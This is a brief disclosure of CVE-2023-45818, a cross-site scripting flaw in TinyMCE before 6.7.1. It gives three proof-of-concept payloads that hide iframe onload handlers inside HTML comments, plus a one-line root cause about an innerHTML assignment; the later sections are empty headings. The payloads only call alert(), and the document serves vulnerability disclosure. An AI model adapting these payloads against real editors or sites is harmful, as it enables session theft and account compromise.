CVE-2023-45818: TinyMCE(<6.7.1) XSS

PoC #1

<!--data-mce-selected="x"-><iframe onload=alert(document.domain)>-->

PoC #2

<!--<br data-mce-bogus="all">-><iframe onload=alert(document.domain)>-->

PoC #3

<!--[U+FEFF]-><iframe onload=alert(document.domain)>-->

Root cause

XSS is triggered by an assignment to innerHTML after the unsafe string replacement is performed at:

When can it be exploited?

See also